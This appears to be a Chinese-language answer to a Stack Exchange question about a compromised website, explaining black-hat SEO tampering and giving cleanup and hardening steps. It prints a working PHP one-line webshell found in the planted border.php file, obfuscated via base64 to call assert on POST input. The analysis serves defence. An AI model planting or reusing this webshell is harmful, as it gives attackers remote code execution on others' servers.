兄弟，你这情况百分百是网站被黑客盯上并入侵了，属于典型的黑帽SEO篡改+留后门操作，我给你拆解下每个异常背后的意图：

1. index文件篡改：黑帽SEO劫持排名 #

把index.html重命名为index1.html，同时生成带恶意代码的index.php，这是黑客为了劫持你的网站流量和SEO排名：

• 服务器默认优先级通常是PHP高于HTML，搜索引擎会优先抓取index.php，而这个被篡改的PHP文件里的代码大概率是用来注入大量违规黑帽关键词、隐藏跳转或篡改页面内容，直接导致你的正常页面被搜索引擎忽略，排名自然下滑。
• 保留index1.html是为了让你自己访问网站时看起来一切正常，延缓你发现入侵的时间。

2. 新增的PHP文件：黑客留的远程控制后门 #

这两个新增文件都是黑客用来操控你服务器的恶意工具：

• border.php：这是典型的一句话木马后门，拆解代码就能明白它的恶意：

  <?php 
  $c=base64_decode('YXNzZXI=').$_GET[n].'t';
  @$c($_POST[x]);
  ?>abcabcabc
  

  base64_decode('YXNzZXI=')解码后是assert，拼接$_GET[n]和t后会构造出执行函数，黑客可以通过POST[x]传入任意代码并执行——简单说，他们能通过这个文件远程删除你的数据、篡改网站内容、窃取敏感信息。
• hagdfi.php：这个文件大概率是辅助后门，可能用来批量挂黑链、维持黑客的访问权限，或者进一步篡改更多网站文件。

紧急处理步骤 #

别慌，按下面的步骤快速止损：

• 第一步：切断恶意访问：暂时关闭网站（比如暂停Apache/Nginx服务），或者用WAF拦截对这些恶意PHP文件的访问，避免黑客继续操作。
• 第二步：清理恶意文件：
  1. 删除hagdfi.php、border.php这两个恶意文件；
  2. 将index1.html改回index.html，删除被篡改的index.php；
  3. 全面扫描网站所有文件，检查其他PHP/HTML文件有没有被添加奇怪代码（比如顶部的不明脚本、隐藏的黑链）。
• 第三步：排查入侵根源：
  1. 查看服务器的FTP/SSH登录日志，寻找异常的登录IP或记录；
  2. 检查网站程序（如果用了CMS/框架）有没有未修复的漏洞，比如插件过期、弱密码、上传漏洞；
  3. 确认服务器有没有开启不必要的端口或服务，暴露安全隐患。
• 第四步：加固服务器与网站：
  1. 立刻修改所有登录密码（FTP、SSH、数据库、网站后台），使用字母+数字+符号的复杂组合；
  2. 更新所有网站程序、插件到最新版本，修复已知漏洞；
  3. 设置严格的文件权限：比如PHP文件设为644，文件夹设为755，禁止脚本文件有过高执行权限；
  4. 安装网站防火墙（WAF）或者安全插件，拦截恶意请求。
• 第五步：恢复SEO排名：
  1. 登录谷歌搜索控制台，提交网站重新抓取请求，让搜索引擎重新识别你的正常页面；
  2. 检查网站的搜索结果，若有违规内容，提交删除请求；
  3. 持续更新优质内容，慢慢恢复网站的信任度和排名。

内容的提问来源于stack exchange，提问作者user1239315